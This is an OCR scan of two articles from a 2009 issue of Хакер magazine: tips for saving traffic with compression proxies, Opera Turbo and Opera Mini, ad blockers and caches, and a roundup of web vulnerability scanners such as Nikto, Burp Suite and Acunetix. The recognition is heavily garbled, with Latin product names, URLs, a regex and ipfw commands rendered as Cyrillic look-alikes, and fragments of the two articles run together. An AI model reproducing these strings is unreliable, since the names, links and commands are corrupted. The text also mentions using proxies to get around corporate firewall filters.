менно оказывается 
и минусом. Проект 
некоммерческий и 
количество серверов, 
используемых для 
сжатия трафика, сильно 
ограничено. В резуль- 
тате, получаем сервис 
который то работает, то не 
работает. В своей поездке 
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мне лишь в половине случаев удалось 
всецело насладиться стабильным 
коннектом через Іоопеі.пеі, но 
иной раз запросы обрабаты- 
вались в лучшем случае 
через раз. 

Впрочем, подобный под- 
ход используется и в массе 
коммерческих сервисов, которые 
берут за свои услуги небольшие 
денежки, но имеют подобающее 
количество серверов и этого 
недостатка лишены (подробнее 
читай во врезке]. 

ТРИК2: 

ТІЖВО-РЕЖИМ 
ОРЕКА’Ы 

Я люблю Орега. Норвежские 
парни всегда умели добавить в 
свое детище изюминку. Пускай 
даже самую маленькую фишку, 
но которая реально могла сделать 
серфинг более комфортным. В тоже 
время, они всегда понимали: каким 
бы навороченным ни был браузер, 
ничего не сможет компенсировать 
медленное открытие ресурсов, превра- 
щающее серфинг в сплошное мучение. 
Это они когда-то впервые додумались 
сделать на панели инструментов кнопку 
для быстрого отключения картинок. Это 
сейчас такая фишка кажется ерундовой, а 
тогда — реально уникальная фича. Сейчас 
пришло время для другой убойной опции 
— Орега ТигЬо, которая станет одной из 
ключевых особенностей Орега 10. По 
сути, Орега ТигЬо делает то же самое, 
что и ІюопеІ.пеС а именно сжимает 
входящий и исходящий трафик. 
Оптимизация осуществляется на 
одном из многочисленных серве- 
ров компании. Браузер исполь- 
зует такие серверы в качестве 
посредника, общаясь с ними по 
уже оптимизированному про- 
токолу. В результате получаем 
существенный прирост ско- 
рости (на слабом коннекте] и 
заметное сокращение рас- 
ходов на трафик. 

Опция активируется кликом 
по пиктограмме в левом 
нижнем углу браузера. 
Индикатор отображает 
сотргеззіоп гаіе — т.е. 
коэффициент сжатия тра- 
фика. Например, «4х» ука- 
зывает на то, что данные 
сжались в 4 раза, и это 
вполне реальный показатель. 
Можно погреть душу, посчитав 
сколько денег сэкономил, если 
навести курсор на иконку: во 
всплывающей подсказке отобра- 
зится количество сэкономленного 



г 



трафика в количественном отношении. 
Важная особенность технологии в том, что 
даже с использованием компрессии сайт 
отображается именно в том виде, в каком 
был изначально. ТигЬо-режим прогоняет 
трафик через сервера, которые сжимают 
НТМЬ-ки (несложная задача], перепаковы- 
вают изображения Э ред с меньшим каче- 
ством (уровень сжатия зависит от настроек], 
а РІазЬ-ки заменяются скриншотами с 
возможностью загрузки полных роликов. 

При этом вся разметка документа, а также 
динамика, реализованная с помощью 
А]ах и Эз-скриптов, по-прежнему остается 
полностью работоспособной. Разработчики 
заверяют, что ни в коем случае не снифают и 
не логируют данные, а все 55І_-соединения 
осуществляются без посредника, т.е. напря- 
мую. Параноики хотя бы ночь могут спать 
спокойно :). 

ТРИКЗ: 

ОРЕКАМШІ 

ПОД ВИНДОЙ И ЛУНКСОМ 

Вообще забавно: о существовании Орега 
знают даже те, у кого компьютера нет в прин- 
ципе. Я не шучу: по статистике внушительную 
часть трафика на ресурсы социальных сетей 
генерируют пользователи мобильных браузе- 
ров и, прежде всего, Орега Міпі. В этом опять 
же заслуга норвежцев: браузер не просто 
классно показывает странички, форматируя 
их для убогого просмотра на небольшом 
экране телефона, но еще и в разы ускоря- 
ет серфинг. Секрет в том, что мобильный 
браузер также пропускает весь трафик через 
специальные промежуточные серверы, но в 



ЭМУЛЯТОР ДЛЯ ЗАПУСКАНИЕ 
ПРИЛОЖЕНИЙ 




КОММЕРЧЕСКИЕ КОМПРЕССОРЫ 



В сети существует немало платных сервисов, которые за небольшую денежку гото- 
вы предложить то, что Іоопеі.пеі: предлагает бесплатно. А именно — сжатие на лету 
всех передаваемых данных. Разница лишь в том, что эти сервисы имеют достаточ- 
ные мощности, чтобы удовлетворять потребностям пользователя, в то время как 
бесплатные решения проседают, не справляясь с нагрузкой. Можно отметить сразу 
несколько вариантов: ІюзТип ( азіип.ги ]. ѴѴеЬ2^і р ( ѵѵѵѵѵѵ.ѵѵеЬ22Ір.соіті 1. СРРОХУ ( ѵѵѵѵѵѵ. 
сргохѵ.сот ]. Огір Ргоху ( ѵѵѵѵѵѵ.дгір-ргохѵ.ги і. ѴѴеЬСотргеззог ( ѵѵѵѵѵѵ.ѵѵеЬсотргеззог.ги ]. 
ТгаШсСотргеззог ( ѵѵѵѵѵѵ.ісотргеззог.ги ]. Причем некоторые из них предоставляют 
специальный бесплатный режим, ограничения которого, однако не позволяют расма- 
тривать их всерьез. Я же на своем опыте достаточно долго использовал ускоритель 
ОІоЬах ( дІобах.ЬЫ . когда основным каналом связи у меня был спутниковый Инет, а в 
качестве обратного канала выступал 6РР5. Без использования ускорителя серфинг 
вызывал уныние: качает быстро, но серфится с дикими задержками. После освоения 
ОІоЬах’а создавалось ощущение, что пользуешься вполне привычным АЭЗБ, плюс ко 
всему экономишь львиную долю трафика. Могу смело рекомендовать этот сервис и 
просто для медленных соединений. Есть вполне доступные тарифы: например, 2$ за 
гигабайт трафика. 

Но и тут есть хинт. По глобаксу ты оплачиваешь трафик несжатый. Поэтому разумнее 
не пускать через ускоритель то, что не будет сжиматься, а пускать такие соединения 
напрямую. С помощью расширения РохуРгоху Похѵргохѵ.тогсіеѵ.огд ] легко создается 
правило, которое несжимаемые файлы закачивает через другой прокси, а остальное 
пускает через глобакс. Правило задается с помощью регеспа, например, так: 

(д И 1 ! ірдІ]р(е]?д|рпд| зѵѵЯ трЗ|тр2|тред|аѵі|хріІ2Ір|гаг|7^| ехе I са Ыѵѵтѵіѵѵта I одд] 



ХАКЕР 09 /129/ 09 



► 033 








РС_20ЫЕ 



■ ■ СТЕПАН «5ТЕР» ИЛЬИН / ЗТЕРОСАМЕЬАЫО.РІІ / 




> іпіо 

Помимо ускорения 
и оптимизации 
расходов на трафик, 
ускорители вы- 
полняют еще одну 
роль. Изменяя твой 
ІР-адрес, они поз- 
воляютзаходить на 
те ресурсы, где 
ствоим настоя- 
щим ІР-шником не 
пускают. И более 
того — таким об- 
разом можно обойти 
некоторые фильтры 
корпоративных 
файрволов, препят- 
ствующие обращени- 
ям к определенным 
ресурсам. 




> СІѴСІ 

Программы и утилиты 
из статьи ты обяза- 
тельно найдешь на 
ОѴО-диске. 
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■ Г 

> Ііпкз 

Описание разметки 
О В М І_: 

сіеѵ.орега.сопп/ 

агОсІез/ѵіеѵѵ/орега- 

Ыпагу-тагкир- 

Іапдиаде . 

Подробнее об ис- 
пользовании Орега 
Міпі на компьютере: 
орегаіап.пеі/сопіепі:/ 
ѵіеѵѵ/309/2 . 
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НАСТРАИВАЕМ ОРЕКАМІШ РКОХѴ ЧЕРЕЗ 
ВЕБ-ИНТЕРФЕЙС 



отличие от Орега ТигЬо, старательно сохраняющего исхо- 
дную разметку страницу, перепаковывает во внутренний 
формат 0ВМ1_ (Орега Віпагу Магкир Еапдиаде). Разметка 
специально подгоняется под мобильное устройство, изо- 
бражения сжимаются, а из всех 35-скриптов выполняются 
только самые простые. Но! В результате таких преобра- 
зований достигается сжатие трафика до 7-8 (!) раз. Это, 
в среднем, вдвое больше, чем при использовании Орега 
ТигЬо. Так может попробовать использовать Міпі-версию 
на десктопе? 

Орега Міпі написана для мобильной версии Заѵа Р2МЕ), 
поэтому для ее запуска на РС нам понадобится специ- 
альный эмулятор — МісгоЕти[а1:ог(ѵѵѵѵѵѵ.ппісгоеппи.огд]. 

П о с кол ь ку это 3 а ѵа - п р и л оже н и е , то ра б отать оно будет н а 
любой платформе: ѴѴіпбоѵѵз, Ыпих, Мас05. Послезапуска 
эмулятора на экране появится изображение импровизи- 
рованного телефона. Размер дисплея на телефоне строго 
зафиксирован, что, естественно, нас неустраивает. Ксча- 
стью, через настройки можно указать устройство, размеры 
экрана которого варьируются какугодно: «Орбопз Веіесі 
беѵісе -> ВезігаЫе беѵісе 5еІ аз сЫаиІІ..». Далее нам 
понадобится апплет самой Орега Міпі, а именно дат и да б 
файлы, которые нужно скачатьс ги.орега.сот и скормить 
эмулятору через меню«ЕіІе Ореп МЮЬеІ Рііе». Все: после 
этого изображение будетзапущено. Единственное — нужно 
убедиться, что апплету разрешен доступ в сеть: «Орбопз 
МЮІеІ: ІМеІѵѵогкассезз». 

Можно попробовать зайти на уапбех или хакер. ги и... рас- 
троиться, потому что текст по-прежнему располагается 
внутри маленькой области, даже несмотря на размер 
экрана. Чтобы пофиксить, придется обратиться к про- 
двинутым настройкам Орега, набрав в адресной строке 
«орегаюопбд». После включения опции «Бк Іо зсгееп» 
разметка займет всю доступную область виртуального 
экрана. Но опять незадача: форматирование выполняется 
для мобильного телефона, а все-таки хочется работать с 
сайтом в изначальном его исполнении. Для этого лезем 
уже в стандартные настройки браузера и отключаем там 
опцию «МоЬіІе ѵіеѵѵ». После этого странички будут выгля- 
дит почти точно так же, как и в обычном браузере. Правда, 
без наворотов с А]ах и ЕІазЬ. 
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ТРИК4: 

ОСВАИВАЕМ ОВМІ. 

И все-таки пускать в ход эмулятор, чтобы, в 
конце концов, использовать решение, адап- 
тированное для удобства работы с телефо- 
на, — не самый удачный вариант. Вот если 
бы сжатие через сервера Орега Міпі Было 
доступно в обычном браузере... Но почему бы 
и нет? Необходим лишь специальный посред- 
ник, который будет преобразовывать докумен- 
ты в Орега’овком формате ОВМБ в обычный 
НТМБ, доступный для любого браузера. В каче- 
стве такого посредника отлично будет выступать 

I 



КАК ИСКУСТВЕННО 
ОГРАНИЧИТЬ 



В, общем-то, чтобы попробовать эту фишку в дей- 
ствии, не дожидаясь полевыхусловий, установи 
программу ЫеНітіІег Рго [ уу\л/уу.пеШтЛег.сот ). 
ЫеНіігнІег предоставляет возможность шейпера, 
позволяя ограничить для отдельных приложений 
пропускную способность или вообще закрыть им до- 
ступ в Сеть. Режимов очень много: можно, например, 
равномерно распределить трафик по всем приложе- 
ниям, а можно выставить максимальный приоритет 
для какого-то одного. 

В случае с Мае 05 реализовать искусственное огра- 
ничение скорости можно, используя такую штуку, как 
ріре. С помощью ірілл/ и ріре можно ограничить про- 
пускную способность, причем не всего канала, а на 
конкретных портах. Например, следующей командой 
мы создаем ріре с ограничением 15 Кб/с наружу: 

зисіо ірілл/ ріре 1 сопбд Ьѵѵ 1 5 КВуІе/з 

Далее надо присоединить этот папцп на исходя- 
щий трафик на 80 порт: 

зисіо ірілл/ асИ 1 ріре 1 зге-рогі: 80 

Таким образом, нужно всего две команды, чтобы 
ограничить скорость коннекта твоего браузера. 
После всех экспериментов пайп удаляется из 
системы командой: 

зисіо ірілл/ сіеіеіе 1 
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Орега Міпі Ргоху [ отрсі-ргохѵ.пагосі.ги ). 

Как несложно догадаться из названия, утилита 
представляет собой локальный прокси-сервер, 
поэтому для ее использования нужно в настрой- 
ках браузера указать проксик — по умолчанию 
127.0.0.1:8080. Орега Міпі Ргоху отправляет все 
запросы на сервера Орега Міпі, принимает ответ 
в формате ОВМІ_ и на лету преобразует его в 
привычный НТМІ_. Просто, как дважды два. 

На том же 8080 порту запускается веб- 
интерфейс для управления приложений. 
Конфиг ничего не стоит отредактировать 
вручную через .сопі-файл, но через веб- 
интерфейс можно создать профайлы с 
разными настройками. Обратиться к нему 
очень просто, набрав в адресной стороке: 
«127.0.0.1:8080». Новый аккаунт создается с 
помощью кнопки «Сгеаіе пеѵѵ ОМ Ассоипі», 
рядом с которой находится поле для указания 
имени пользователя. Для каждого профиля 
есть несколько важных настроек: 

• НТМІ_ раде ѵѵісШп — задает ширину экрана, 
на котором будет отображаться текст. С этим 
значением нужно поиграться так, чтобы полу- 
чить наиболее подходящий для твоего раз- 




ОТЛИЧНЫЙ ЛОКАЛЬНЫЙ ПРОКСИ 
ДЛЯ КЭШИРОВАНИЯ ДАННЫХ 



решения вариант; 

• Метогу зіге іп кб — задает максимальный 
размер блока, загружаемый за один раз. 
Рекомендую увеличить стандартное значение 
(3000) в 2-2.5 раза; 

• ОМ ргоіюсоі ѵегзіоп — используется для 
указания протокола. Рекомендую значе- 
ние — 3. 

Еще один нюанс — это работа с изобра- 
жениями. По умолчанию, вместо картинок 
отображаются прямоугольники, которые 
загружаются при наведении на них мыши. 
Удобная фишка, но если тебя она не 
устраивает, то можно выбрать несколько 
других режимов: «без загрузки изобра- 
жений», «с изображением и указанием 
степени сжатия». 



ТРИК5: 

УРЕЗАЕМ 
ВСЕ ЛИШНЕЕ 

Еще одно простое правило, как можно сэко- 
номить трафик — не загружать то, что тебе 
не нужно. Нет смысла оплачивать просмотр 
рекламы, закачивая пачками многочисленные 
баннеры, всплывающие окошки и ЕІазЬ-ки. 
Тем более, можно в мгновение отключить все 
сразу. Выше всех похвал утилита Аб Мипсбег 
( ѵѵѵѵѵѵ.абппипсЬег.сопп ]. Всего в 400 Кб про- 
граммы умещается настоящая гроза для 
рекламы в любом ее проявлении. Правила 
блокировки задаются специальными филь- 
трами, с помощью которых можно наладить 
удаление не только стандартных баннеров и 
рорир’ов, но и «тяжелой» ЕІазЬ-рекламы. Да 
что там — ничего и налаживать не надо. В АО 
Мипсбег по умолчанию встроена проработан- 
ная база регеспов, которые успешно расправ- 
ляются с 98% рекламы. Редкий случай, когда 
что-то остается ими незамеченным. Еще один 
важный плюс — программа автоматически 
перехватывает запросы из любого браузера, и 
ее не надо прописывать как локальный прок- 
си. Просто установил — и все сразу работает. 
Единственное, с чем приходится мириться 
— это платность приложения. Впрочем, есть 
и другие эффективные варианты. Плагин 
АбЫоск Ріиз ( ШрзУ/аббопз.тогіЦа.огд/ 
еп-ЦЗ/ЕгеЬх/аббопЯЭбб ) я устанавливаю 
одним из первых для своего Еігеіюх’а. После 
установки необходимо настроить правила, 
которые будут использоваться для фильтра- 
ции рекламы. Такие правила обновляются 
автоматически: необходимо лишь оформить 




РЕЖИМ ОРЕРАТІІРВО ВКЛЮ- 
ЧАЕТ ОДНИМ КЛИКОМ МЫШИ 



подписку на нужный набор регеспов: для 
России предусмотрен особый вариант. 

ТРИК6: 

КЭШ — НАШЕ ВСЕ 

Браузеры достаточно хорошо кэшируют 
просматриваемые страницы, однако неко- 
торые вещи почему-то обходятся стороной. 

К тому же, надо помнить, что у каждого бра- 
узера — кэш свой. А я, по правде говоря, 
постоянно пользуюсь несколькими браузе- 
рами: Еіге!ох для обычной работы и Ооодіе 
СЬготе для запуска веб-приложений. 
Поэтому крайне полезным является уста- 
новка добротного кэширующего проксика. 
Отличным вариантом является НапбуСасбе 
[ ѵѵѵѵѵѵ.ЬапбѵсасЬе.ги І от нашего отечествен- 
ного разработчика. Эта бесплатная про- 
грамма, которая экономит трафик за счет 
кэширования, ускоряет загрузку страниц 
(локальных, естественно], блокирует рекла- 
му и позволяет в автономном режиме (без 
подключения к инету) просмотреть любые 
посещенные ранее сайты. НапбуСасбе 
гибко настраивается и, в зависимости от 
ИРЕ (адреса) и типа файла (расширения), 
может или брать его из кэша, или всегда из 
Инета или руководствоваться наличием на 
сайте более новой версии файла, а может 
вообще блокировать его загрузку (рекламу 
и прочее нежелательное содержимое сай- 
тов] — и это далеко не весь список возмож- 
ных действий. Его можно использовать в 
связке с компрессором, указав последнего 
в качестве прокси-сервера. 

Еще один хитрый трик — кэширование 
БЫЗ-запросов, эффект от которого особенно 
сильно заметен на медленных соединениях. В 
случае ОРВЗ-коннекта ОЫЗ-резолвинг может 
занять секунду, а то и больше. Это время 
можно легко отыграть, если заблаговремен- 
но сохранять ІР-адреса всех нужных хостов. 

С этим отлично справляется специальный 
модуль в файрволе Оиірозі: ( ѵѵѵѵѵѵ.адпкипп. 
ш) или специальная программа Асгуііс 
( зоигсеЬгде.пеі/ргоіесІз/асгѵІіс/ ). 

Маленький совет в завершение: если 
приезжаешь в чужой город и тебе нужен 
нормальный стабильный коннект, попробуй 
найти ѴѴі-Еі спот. Проще всего это сделать, 
воспользовавшись сервисами уѵіб.таіі.ги . 
ѵѵіМІгее.ги . В моем случае кафе с бесплат- 
ным инетом находилось в соседнем доме, 
пока я уверенно отдавал денежки за сла- 
бый ОРРЗ-инет :). ~іг 
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ЛУЧШИЕ ИНСТРУМЕНТЫ ПЕНТЕСТЕРА 
ИССЛЕДОВАНИЕ ВЕБ-ПРИЛОЖЕНИЙ 




У каждого из команды ][ — свои предпочтения по части софта и утилит для пентеста. Посовещавшись, 
выяснилось, что выбор так разнится, что можно составить настоящий джентльменский набор из прове- 
ренных программ. На том и решили. Чтобы не делать сборную солянку, весь список мы разбили на темы. 
Поиск уязвимостей в веб-приложениях — это определенно одна из интереснейших тем. 




СКАНЕР ЫІКТО ВХОДИТ 
В СТАНДАРТНЫЙ НАБОР 
ВАСКТКАСК’Р 

Подставил кавычку в нужном месте — и 
нашел возможность для инъекции? 

Проснись! Давно прошли времена, когда 
пионерские способы помогали найти ошибки 
даже в серьезных проектах. Поиск брешей 
в безопасности стал намного более изощ- 
ренным, как и техники для успешной экс- 
плуатации уязвимостей. Если раньше легко 
было справиться собственными силами, то 
теперь без вспомогательных инструментов 
не обойтись. Последние не только выполнят 
муторную работу за тебя, но и подскажут, как 
можно воспользоваться багой, а в некоторых 
случаях — даже автоматизируют процесс экс- 
плуатации. Итак, приступим? 

-+ Ыікіо 

ѵѵѵѵѵѵ.сігі;. пе1;/пік1;о2 
Платформа: ѴѴІпсіоѵѵз, ІІпіх 

Назвав свой сканнер «никто» разработчики 
сильно слукавили. На деле — это извест- 
ный сканер веб-уязвимостей, способный 
сканировать удаленные хосты и проводить 
сложные тесты безопасности. В базе про- 
граммы имеется информация о более чем 
3500 уязвимимых сценариях. Информация об 
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ОПИСАНИЕ НАЙДЕННОЙ 
АРРБСАІМ'ОМ ИНЪЕКЦИИ 

уязвимостях хранится в специальных базах, 
подключаемых к программе в виде плагинов. 
Последний апдейт приложения был, увы, еще 
в 2007 году, но зато на офсайте [ ѵѵѵѵѵѵ.сігі.пеі/ 
п і кГо/Ц РРАТЕ5/2.03 ) по-прежнему появляют- 
ся обновления баз. Программа даже поддер- 
живает автоматическую подгрузку свежих баз 
с узявимостями, но их и без этого несложно 
устанавливать. Вот если бы вместо этого 
апдейты почаще... 

Сам прога написана на РегГе, поэтому вся 
работа осуществляется из командной стро- 
ки. Помимо поиска уязвимых сценариев, 
Ыікіо попробует определить версию веб- 
демона, отыскать файлы с открытыми паро- 
лями, а также выполнить десяток других 
проверок. Полноценная поддержка прокси 
(с возможностью авторизации] при пра- 
вильном подходе обеспечит тебе безопас- 
ность. Правда, о незаметном сканировании 
придется забыть. С самого начала разра- 
ботчики сделали упор на скорость скана, не 
заморачиваясь по поводу зіеаііб- методов. 

С другой стороны, ядро Ыікіо составляет 
известная библиотека ЕіЬѴѴЬізкег, у которой 
в арсенале есть несколько методик для 
обмана Ю5. Их сканер безусловно под- 



держивает, но большинство из них уже 
устарели. 

^ІВМ Каііопа Аррзсап 

ѵѵ ѵѵѵѵ- 0 1 . і Ь т . с о т/зоіі ѵѵа ге/ 
аѵѵсііооіз/аррзсап 
Платформа: ѴѴІпсІоѵѵз 

Маститый коммерческий продукт, который 
изначально разрабатывался авторитетной 
компанией ѴѴаІсЫіге, а потом был куплен 
ІВМ. Это уже не любительская поделка вроде 
сканера Ыікіо. Раііопа I Аррзсап предназна- 
чен для аудита ѴѴеЬ-приложений и содержит 
не один десяток эвристических методов 
для конкретного изучения каждого скрипта. 
Поиск уязвимостей осуществляется автома- 
тически, главное — правильно задать все 
параметры сканирования с помощью специ- 
ального мастера. На выходе ты получишь 
отчет о проделанной работе паука, воссозда- 
ющего структуру сайта, а также информацию 
о потенциальных брешах в безопасности. 
Аррзсап детально рассказывает о каждой 
найденной уязвимости, определяя ее кате- 
горию: ЭОЕ-инъекция, Сгозз-Эііе Сгірііпд, 
нуль-байт, скрытые манипуляции с полем, 
переполнение буфера и т.д. Некоторые из 
категорий имеют солидный список разновид- 
ностей: если взять 50Е-инъекции, то в отчете 
ты легко найдешь разделы с классическими, 
слепыми и инъекциями с помощью кукисов. 
Причем, какой именно параметр можно экс- 
плуатировать, покажет сам сканер. Одна из 
немаловажных особенностей Аррзсап — тол- 
ковое сканирование сложных приложений, 
построенных с обильным использованием 
Оаѵа Эсгірі и АОАХ-кода и элементами АбоЬе 
ЕІазЬ. Специалистам по информационной 
безопасности Аррзсап полезен еще и тем, 
что содержит 40 готовых отчетов о соот- 
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утилит: для создания дампа базы данных 
с использованием инъекций, фаззер для 
манипуляций с передаваемыми значения- 
ми, брутфорс форм, снифер НТТР-запросов 
и т.д. 

гМсипеІіх ѴѴеЬ Бесигііу 
Бсаппег 

ѵѵ ѵѵ ѵѵ. а с и п еі: і х . со т 
Платформа: ѴѴІпсІоѵѵз 



ветствии требованиям, включая требования 
стандартов безопасности данных РСІ, 150 
17799, 150 27001, Вазеі II, 5В 1386 и РАВР 
(Раутепі Арріісабоп Вез! РгасОсез], что не 
может не радовать. 

НР ѴѴеЫпзресІ 

ѵѵѵѵѵѵ.Ьр.сот 
Платформа: ѴѴІпсІоѵѵз 

Этот сканер, который теперь принадлежит 
компании НР, ранее так же разрабаты- 
вался независимой командой зесигБу- 
специалистов — 5РІ Бупатісз и лишь 
потом был куплен ІТ-гигантом. И это один 
из самых удачныч сканеров безопасности. 
Почему? Ну, во-первых, весь процесс пен- 
теста сопровождается интерактивным отче- 
том, позволяющим быстро вникнуть в струк- 
туру ресурса и разобраться с возможными 
дырками. Во-вторых, разработчики позабо- 
тились о том, чтобы максимально заточить 
продукт для выполнения тестов на про- 
никновение в серьезных веб-приложениях. 
Объектом исследования могут быть всевоз- 
можные скрипты, динамически обновляе- 
мые сервлеты и фреймворки. ѴѴеЫпзресІ: 
позволяет выявлять большинство суще- 
ствующих уязвимостей, которые наиболее 
часто встречаются на сайтах. В то время 
как многие простецкие сканеры курят в сто- 
ронке, ѴѴеЫпзресІ; отлично справляется с 
анализом сложных ѴѴеЬ 2.0 сайтов, постро- 
енных на современных 35-фреймворках и 
с повсеместным применением А]ах. Также 
как и Аррзсап, продукт умеет декомпили- 
ровать 5ѴѴР-файлы, т.е. элементы сайта на 
РІазЫе и анализировать АсЛопБсгірЫкод. 
Причем, помимо непосредственно сканера, 
в продукт входит дюжина вспомогательных 

АСІІ5ЕЫ50Р ПОКАЗЫВАЕТ ДАЖЕ - 
УЧАСТОК КОДА С УЯЗВИМОСТЬЮ 




Еще один коммерческий сканер, который 
вместе с Арр5сап и ѴѴеЫпзресІ: входит в 
тройку самых-самых. Продукт серьезно рас- - 
кручен, но он бы в век не добился такой 
популярности без того набора фич, который 
он в себе несет. Основная функция — пол- 
ностью автоматический пентест. Первым 
делом программа проводит разведку, 
исследуя структуру сайта и возможные 
векторы атак (сценарии, формы, кукисы и 
т.д.]. Далее наступает этап проверки, когда 
5еси гіЕу 5саппег начинает моделировать 
ввод данных с использования фаззера, 
выполняя хитрые подстановки и анали- 
зируя реакцию на них сервера. Большая 
коллекция готовых сниппетов позволяет 
эффективно выявить огромное количество ^ 
потенциальных ошибок, которые легко 
заэксплуатировать. 

Среди доступных для обнаружения уязви- 
мостей: все виды 50Б іщесБоп, Сгозз зБе 
зсгірбпд, СЕБЕ іщесбоп. Важно, что сканер 
производит анализ с умом и учитывает 
специфику удаленной системы — от тебя 
требуется лишь выбрать правильный про- 
филь. 

Есть у АсипеЛх ѴѴеЬ 5е с и гі 1;у 5саппег и 
фишка, которая заслуживает особого 
внимания — это технология Аси5епзог. 
Стандартные методы сканирования силь- 
но ограничены в возможностях, потому 
как основываются на анализе ответов, 
которые возвращает сервер на различные 
запросы (так называемое сканирование 
черным ящиком]. Аси5епзог позволяет 
провести намного более глубокое тести- 
рование при условии, что у тебя на руках 
есть исходники приложения (форум, чат, 
СМ5, онлайн-магазин — любой публично 
доступный скрипт]. В этом случае можно 
комбинировать стандартные механиз- 
мы сканирования с (внимание!] одно- 
временным анализом исходного кода, 
имея при этом четкое представление о 
ходе выполнения программы изнутри! 
Представляешь, чего можно добиться 
таким образом? В твоем распоряжении 
будет не просто информация о возможной 
уязвимости, но и конкретный кусок кода, 
где она найдена, включая номер строки, 
трейс стека и содержание БОБ-запроса, 
который при этом отправляет серверу 
база данных. Более того, ты получа- 
ешь возможность искать баги, которые 




ОШИБКИ Х55 р НАЙДЕННЫЕ 
СКАННЕРОМ ВІІКР5ШТЕ 



при стандартном сканировании найти 
практически невозможно. Это касается, 
например, инъекций в I ІЧБЕВТ-запросах 
отыскать и эксплуатировать их крайне 
непросто из-за того, что они не возвра- 
щают результата. А своеобразный отлад- 
чик АсиБепзог’а не только позволит их 
обнаружить, но и далее раскрутить най- 
денную брешь до ощутимого результата. 
Супер фича! 

Вигр Биііе 

эогізѵѵіддег.пефзиііе 
Платформа: ѴѴІпсіоѵѵз, 

ІІпіх, Мае 

Вигр 5и М;е — это не одна утилита, а целый 
комплекс тулз для пентестера. Самой 
главной частью программы является Вигр 
Ргоху, который устанавливается в качестве 
локального веб-проксика и перехватывает 
НТТР/НТТР5-трафик браузера. Другие ути- 
литы, а именно Эрісіег, Іпігисіег, Бсаппег, 
Ререаіег, Бедиепсег, Бесосіег и Сотрагег 
связаны как с этой самой прокси, так и 
между собой. Например, часть перехва- 
ченных с помощью Вигр Ргоху параме- 
тров можно тут же проверить на предмет 
фильтрации со стороны сервера. Для этого 
достаточно отправить их на растерзание 
Іпігисіег’у. Последний заслуживает особого 
внимания, потому как именно с его помо- 
щью можно отыскать и БОБ-инжекции, и 
Х55-уязвимости — и много чего еще. На 
вход утилите ты передаешь объект про- 
верки, определяешь параметры, которые 
будут изменяться (на основе специально 
сформированных шаблонов], и выбира- 
ешь тип атаки. Вообще, большая часть 
пакета предназначена не для автомати- 
ческого взлома, а для помощи пентестеру. 
Зато утилита Бсаппег, доступная в Рго- 
редакции, представляет собой полностью 
автоматизированный сканер, способный 
самостоятельно обнаруживать уязвимо- 
сти в веб-приложениях. Любопытным 
представляется режим «Біѵе зсаппіпд», 
который проверяет на вшивость те сайты, 
который ты в данный момент просматри- 
ваешь. 
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> ІПІО 

Несмотря на то, что 
здітар написана 
на РуіЬоп, суще- 
ствует специальная 
рогіаЫе-версия, 
которая уже включает 
в себя интерпретатор. 
Она также есть на 
нашем диске. 



> СІѴСІ 

Подборка сканеров 
для тестирования 
веб-приложений 
ждеттебя на нашем 
0Ѵ0. Увы, но часть 
коммерческих при- 
ложений, недоступ- 
ных для закачки, мы 
положить на диск не 
имели права. 



1 пгч5 ■; =05-Т| . 



ілчАічч Рсг гвгкични К Л 









ПРОКСИ РАК05 

Рагоз Ргоху 

ѵѵѵѵѵѵ. рагозргоху.огд 
Платформа: ѴѴІпсіоѵѵз, ІІпіх, Мае 

Чтобы найти уязвимость, нужно, как минимум, иметь 
перед собой картину того, что передается между сер- 
вером и клиентом по протоколу НТТР/НТРР5: запросы, 
кукисы, поля форм. Вдвойне здорово, когда такой НТТР- 
снифер изначально рассчитан на поиск уязвимостей. 
Благодаря Рагоз Ргоху ты не просто можешь на лету 
изменить сходящие НТТР/НТТР5-запросы, логировать 
собственный траф, но еще и использовать встроенные 
сканеры, с помощью которых тут же проверять сцена- 
рии на наличие уязвимостей 501_ Іщесбоп и Х55. Сам 
Рагоз Ргоху работате в виде прокси-сервера, собирая 
всевозможную информацию во время твоего серфин- 
га. Различные методы сканирования реализованы в 
подключаемых плагинах, которые в принципе можно 
разработать самому. Увы, разработчики не развивают 
дальше проект, полностью переключившись на свое ком- 
мерческое детище МіІеВСАЫ ѴѴеЬ ВесигТу АисЫог ( ѵѵѵѵѵѵ. 
тііезсап.сот/бк і. 



ѴѴаріІі 2.1.0 

ѵѵарШ.БоигсеЬгде.пеІ; 

Платформа: ѴѴі псіоѵѵз, ІІпіх, Мае 

Консольная утилита для аудита веб-приложений. В осно- 
ве — знакомый по другим сканерам принцип черного 
ящика (ЫаскЬох), когда анализируются не исходники при- 
ложения, а ответы сервера на хитрые запросы сканера. 
Для этого прога сначала анализирует структуру сайта, 
ищет доступные сценарии, составляет список параметров 
для проверки, а затем включает на всю катушку свой фаз- 



ѴѴАРІТІ ЗА РАБОТОЙ 

зер. И продолжает тщательную проверку до тех пор, пока 
все уязвимые скрипты не будут найдены. Сейчас в арсе- 
нале тулзы методики для определения: инъекций в базы 
данных (включая НР/65Р/А5Р 5СП_ и ХРзіЬ инъекции], 
Х55-багов, ЮАР-инъекций, СРБР-багов (НТТР Резропзе 
ЗрІіШпд], ошибок в обработке файлов (локальный и 
удаленный іпсіисіе, іюреп, геабЫе и т.д.) , возможности 
выполнения команд (еѵаШ, зуз1:епп(], раззЫиШ. В отличие 
от КШо, который использует базу дырявых сценариев (а я 
напомню, что обновляется она нечасто], ѴѴаріб изначаль- 
но настроен на поиск неизвестных уязвимостей. 



РгохуБІгіке 

ѵѵѵѵѵѵ.ебде-зесигку.согті 
Платформа: ѴѴІпсІоѵѵз, ІІпіх 

Активная веб-прокси для поиска уязвимостей в веб- 
сценариях, с которыми ты в данный момент имеешь дело. 
Такой подход особенно актуален для сложных приложе- 



РР0ХѴ5ТШКЕ ИДЕАЛЬНО ПОДХОДИТ для 
ПЕНТЕСТААМХ-ПРИЛОЖЕНИЙ 



НА ЧЕМ ПОТРЕНИРОВАТЬСЯ? 



Попробовать свои силы в проникновении на удаленную систему 
проще всего на специальном дистрибутиве Ратп ѴиІпегаЫе І_іпих 
( ѵѵѵѵѵѵ.бапппѵиІпегаЫеІіпих.ога ]. Среди дырявых сервисов, для кото- 
рых легко пишется эксплоит, простых паролей для системных поль- 
зователей и прочих бед горе-администора есть и уязвимые веб- 
сценарии, на которых ты можешь попрактиковаться. Система легко 
запускается под виртуальной машиной ѴМѵѵаге или ѴігІиаІВох. 
Другая менее известная сборка с уязвимыми приложениями, рас- 
пространяющаяся в виде образа для ѴѴМѵѵаге, носит название Моба 
( ѵѵѵѵѵѵ. Ьопзаі-зес.сот/еп/гезеагсЬ/тоіЫрЬр ] 

